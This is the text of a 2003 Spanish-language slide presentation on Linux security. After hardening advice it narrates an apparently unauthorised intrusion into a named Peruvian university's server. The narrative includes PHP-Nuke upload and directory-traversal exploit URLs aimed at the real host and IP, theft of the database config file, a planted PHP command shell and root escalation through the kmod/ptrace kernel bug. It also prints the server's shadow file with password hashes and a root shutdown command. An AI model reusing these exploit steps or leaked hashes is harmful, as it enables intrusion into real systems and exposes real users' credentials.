SEGURIDAD YHACKINGEN LINUXAlonso Eduardo Caballero Quezada - ReYDeS -RareGaZz Security Team http://www.RareGaZz.orgSecurit...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I1. Seguridad2. Seguridad en GNU/Linux3. Hacking en Linux. (U.N...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I1. Seguridad en GNU/LinuxSeguridad:Seguridad es la característ...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IQue proteger?. SoftWare. HardWare. Datos
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IDe quien nos protegemos?- Personas:. Personal de la empresa. E...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I- Amenazas Logicas:. Software incorrecto. Herramientas de segu...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ISEGURIDAD EN LINUX
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I1. Definición de losservicios necesarios.. Servidor Web (Apach...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I2. Utilizar Herramientasde Bastionado.(BASTILLE ó TITAN). Educ...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I3. Utilizar un Antivirusbasado en Software Libre.(AmaViS). Ind...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I4. Utilización de un PROXY(SQUID).. Un punto de acceso entreun...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I5. Instalación y configuraciónde un Firewall.(IPTABLES).. Un p...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I6. Detección de Instrusosbasados en HOST.(Tripwire). Comprobar...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I7. Sistema Detector de Intrusos(IDS). Vigilancia del Servidor....
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I8. Administrador. Persona adecuada.. Experiencia. (*). Actuali...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IHACKING EN LINUX
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IADVERTENCIA:El artículo completo y detallado de lo expuestoa c...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IInstitución:Universidad Nacional de TrujilloURL:http://www.uni...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IPrimer Punto:Obtener todo la informacion posible delsistema.- ...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH INMAP
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH INessus
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ISistemas Vulnerables: PHP­Nuke 5.2 y anterioresSistemas Inmune...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IPHP NUKE EXPLOIT
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ILo anterior, permite automatizar el test sobrela falla en “adm...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IAhora la siguiente URL, nos permite listarcualquier directorio...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ISe puede listar cualquier directorio y verarchivos, pero solo ...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I. Problema: Tenemos el directorio /tmp/ paraescritura, pero no...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IPHP Nuke xploit: Permite subir archivos alsistema.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ICon la ayuda de PHP-Nuke exploit para subirarchivos y el PHP S...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I. En /foro/:. Subir cmd.html, rs.php Y en nuestro localhostuti...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ILinux kmod/ptrace bug:Cuando un proceso hace una petición a un...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH Iroot:$1$1j/xKdpw$KMm/nMEBb3tZkpj42oiL9/:11913:0:::::bin:*:9797...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IGracias por su atención[root@camaratru root]# shutdown -r nowe...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IAgradecimientos:Mi Madre, mi hermana, mi sobrino y Padre.Angel...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IProblemas de identidad    * Me he olvidado el pasword....    *...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Upcoming SlideShare
Loading in...5
×

Presentacion re y_des_09072003

268

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
268
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
34
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Presentacion re y_des_09072003

  1. 1. SEGURIDAD YHACKINGEN LINUXAlonso Eduardo Caballero Quezada - ReYDeS -RareGaZz Security Team http://www.RareGaZz.orgSecurity Wari Projetcs http://www.SWP-zone.orginformatizate http://www.informatizate.netMiércoles 9 de Julio del 2003
  2. 2. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I1. Seguridad2. Seguridad en GNU/Linux3. Hacking en Linux. (U.N.T)
  3. 3. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I1. Seguridad en GNU/LinuxSeguridad:Seguridad es la característica de unsistema informático, que indica queese sistema está libre de todopeligro.“La seguridad es un estado mental”
  4. 4. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IQue proteger?. SoftWare. HardWare. Datos
  5. 5. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IDe quien nos protegemos?- Personas:. Personal de la empresa. Ex-empleados. Curiosos. Hackers. Crackers. Terroristas (*). Intrusos Remunerados- Desastres Naturales:
  6. 6. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I- Amenazas Logicas:. Software incorrecto. Herramientas de seguridad. Puertas traseras (Backdoor). Bombas Logicas. Canales cubiertos. Virus. Gusanos. Caballos de Troya
  7. 7. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ISEGURIDAD EN LINUX
  8. 8. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I1. Definición de losservicios necesarios.. Servidor Web (Apache). Servidor de Correo(Sendmail). Servidor SSH, FTP, DNSetc.
  9. 9. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I2. Utilizar Herramientasde Bastionado.(BASTILLE ó TITAN). Educa al administradorsobre potenciales problemasde seguridad en el sistema.
  10. 10. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I3. Utilizar un Antivirusbasado en Software Libre.(AmaViS). Indicado cuando hayinteracción entre Linux uotro sistema Operativo.
  11. 11. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I4. Utilización de un PROXY(SQUID).. Un punto de acceso entreuna intranet y unainternet.. Control de los datos.(squidGuard)
  12. 12. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I5. Instalación y configuraciónde un Firewall.(IPTABLES).. Un punto estratégico devigilancia del sistema.. Creación de reglas para lasconecciones y servicios.
  13. 13. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I6. Detección de Instrusosbasados en HOST.(Tripwire). Comprobar la integridadde los archivos en elsistema.
  14. 14. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I7. Sistema Detector de Intrusos(IDS). Vigilancia del Servidor.. Detección de actividadsospechosa.. Respuesta mediata e inmediata. Uso de (ACID) Consola de D.I
  15. 15. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I8. Administrador. Persona adecuada.. Experiencia. (*). Actualización constante.
  16. 16. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IHACKING EN LINUX
  17. 17. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IADVERTENCIA:El artículo completo y detallado de lo expuestoa continuación sera publicado en la eZineRareGaZz Número 20. http://www.RareGaZz.orgTodo esta información se expone solo con finesdidacticos y de conocimiento. De ningunamanera el autor o el Grupo RareGaZz induce arealizar este tipo de acciones.ReYDeS / RareGaZz Security Team
  18. 18. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IInstitución:Universidad Nacional de TrujilloURL:http://www.unitru.edu.peTiempo Total:2 horas.Objetivo:Auditoria Personal y Libre de la Seguridad delservidor de la Universidad Nacional de Trujillo
  19. 19. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IPrimer Punto:Obtener todo la informacion posible delsistema.- Tools. NMAP (www.insecure.org/nmap). NIKTO (http://www.cirt.net/code/nikto.shtml). NetCat. Comandos propios de Linux, desde un simpleping a un dig por ejemplo.- Software De Auditoria:. NESSUS (http://www.nessus.org)
  20. 20. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH INMAP
  21. 21. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH INessus
  22. 22. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  23. 23. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ISistemas Vulnerables: PHP­Nuke 5.2 y anterioresSistemas Inmunes: PHP­Nuke 5.0 RC1Exploit: Probando el formato de la siguiente URL:http://www.example.net/admin.php?upload=1 &file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php &userfile_name=hacked.txtMediante la anterior peticion de la anterior URL se podríaobserver leer en “config.php”. El cual contiene las claves de laBase de Datos. Con todas las posibles consecuencias que elloacarrea.
  24. 24. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IPHP NUKE EXPLOIT
  25. 25. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ILo anterior, permite automatizar el test sobrela falla en “admin.php”La URL que se analiza es la siguiente:http://www.unitru.edu.pe/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txtCon esto se copia “hacked.txt” al directorio“images”. Pero nos lleva al menu administracióncon el siguiente error:Warning: Unable to create /www/htdocs/images/hacked.txt’: Permission denied in /www/htdocs/admin.php on line 400
  26. 26. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  27. 27. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  28. 28. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IAhora la siguiente URL, nos permite listarcualquier directorio de la web. En éste caso“/images/admin/”http://www.unitru.edu.pe/admin.php?upload=1&wdir=/images/admin/Solo directorios de la WEB?... NO!http://200.60.44.6/admin.php?upload=1&wdir=/../../../La Raiz del sistema (Formato texto)bin bin 4k 22-03-2001 18:56:22boot boot 1k 23-03-2001 07:20:08etc etc 4k 12-03-2003 09:04:18root root 4k 22-02-2003 10:25:13...
  29. 29. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ISe puede listar cualquier directorio y verarchivos, pero solo con permisos de nobody.Que se necesita para elevar privilegios?.. Acceso de escritura a un directorio.. Copiar el config.php. Archivo de laconfiguración del phpnuke.. Obtener mas información del sistema. Peroahora desde dentro, por ejemplo Softwareinstalado, versiones, actualizaciones,conecciones, etc.
  30. 30. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I. Problema: Tenemos el directorio /tmp/ paraescritura, pero no podemos visualizar elarchivo. Ya que estamos trabajando vía web.. Solución: Encontramos el programa YaBBhttp://aries.unitru.edu.pe/foro/install.php. Se tiene derechos de escritura en /foro/ ypodemos visualizarlo vía web. Con lo cual:http://200.60.44.6/admin.php?upload=1&file=config.php&file_name=p.txt&wdir=/foro/&userfile=config.php&userfile_name=p.txt[DIR] Parent Directory 24-Feb-2003 23:47 -[ ] install.php 18-Feb-2003 03:08 18k[TXT] p.txt 18-Mar-2003 01:11 11k[ ] yse150.ya 18-Feb-2003 03:09 1.8M
  31. 31. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IPHP Nuke xploit: Permite subir archivos alsistema.
  32. 32. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ICon la ayuda de PHP-Nuke exploit para subirarchivos y el PHP Shell para ejecutar comandosya se tiene un mejor control sobte el sistema.
  33. 33. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I. En /foro/:. Subir cmd.html, rs.php Y en nuestro localhostutilizamos el phpnuker.html.Problema: Obtener privilegios ROOT.Solución: Ejecutar un exploit para “explotar”una falla en el sistema. Por ejemplo. Versióndel Kernel?uname -aLinux aries 2.4.2 #2 Fri Mar 23 06:53:47 PET 2001 i686unknown
  34. 34. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH ILinux kmod/ptrace bug:Cuando un proceso hace una petición a unacaracteristica que esta en un modulo. En kernelcrea un proceso hijo setea los permisos EUIDGUID a 0 y llama a la funcion execve(“/sbin/mdprobe”)El problema es que antes de que el EUID cambieel proceso hijo puede ser añadido con ptrace. Deésta manera el usuario puede insertar codigodentro del proceso lo cual se ejecutará conprivilegios de superusuario (ROOT).Ejemplo: ->
  35. 35. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH Iroot:$1$1j/xKdpw$KMm/nMEBb3tZkpj42oiL9/:11913:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::gdm:*:9797:0:::::nobody:*:9797:0:::::dwong:$1$3NZyPSF2$2VO7nReTKGN5Y9PftBX1j/:12122:0:99999:7:::mysql:$1$2DIuivNW$5/35UzOTWcOdaPvqRFcuX.:11404:0:99999:7:::webmaster:$1$qcRvrUzR$U9Y5LepV0STQewAdD6FkA/:11624:0:99999:7:::toor:$1$12/Juu6R$riwwt6ZQcX4fKyynY3eZq1:11438:0:99999:7:::jchong:$1$DE/x6fuY$OWWC0qFyQMm7d9XdbG5f1/:11871:0:99999:7:::kayluss:$1$dWpxKneU$plRq15DL8/qtO9Z8414yW0:11914:0:99999:7:::eponte:$1$0hXuyKVe$Qxbdcg/erYBLpPkHNodC0.:12107:0:99999:7:::
  36. 36. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IGracias por su atención[root@camaratru root]# shutdown -r nowe-mail: ReYDeS@bigfoot.com
  37. 37. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IAgradecimientos:Mi Madre, mi hermana, mi sobrino y Padre.Angel Protector, alt3kx, Buanzo, PaTa, ocsic, Shadown,enan0, v1k1ng0, MaGics, Yo_soy, runl3v3l, xDAWN, Rebel,Neoy2k, RareTrip, GuyBrush, y0ni, y a todos los quealguna vez participaron en RareGaZz Security Team.A sicario, incompatible, xyz4a3, Sudmaster, y atodo los amigos de Security Wari Projects.A todos mis amigos virtuales del “Underground”.A Miguel, David, Deus, Francisco, Victor, Robert y JuanManuel, del grupo informatizate.A Arturo, Alejandro, Javier, Juan, miembros de ICIAT.A todos mis amigos “reales”.A Juditsa, Claudia, Paola, Betsy, Cecilia, Carol,Miluska, Marilyn, Patricia, Silvana, Sara, Angela, Leily,Maribel, Cynthia, Elizabeth, Milagros, Erika, Jhenice,Nathaly, etc, etc. En especial a mi:Futura Esposa.(Donde quiera que este)
  38. 38. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH IProblemas de identidad    * Me he olvidado el pasword....    * Me he olvidado mi login....    * ( variante de la anterior ) Es que no sé quien soy....    * Es que soy tonto, y necesito que me lo hagan....    * ¿Cuál es mi "dolarjome"? Aspirantes a hacker    * ¿Qué tengo que hacer para entrar de root?    * ¿Cómo puedo saltarme el firewall?    * Oye, no me deja cambiar la configuración de las X...    * Es que quiero poner un sniffer, y necesito entrar de root...    * Qué hay que hacer en el firewall para que funcione la VozIP?
  39. 39. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  40. 40. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×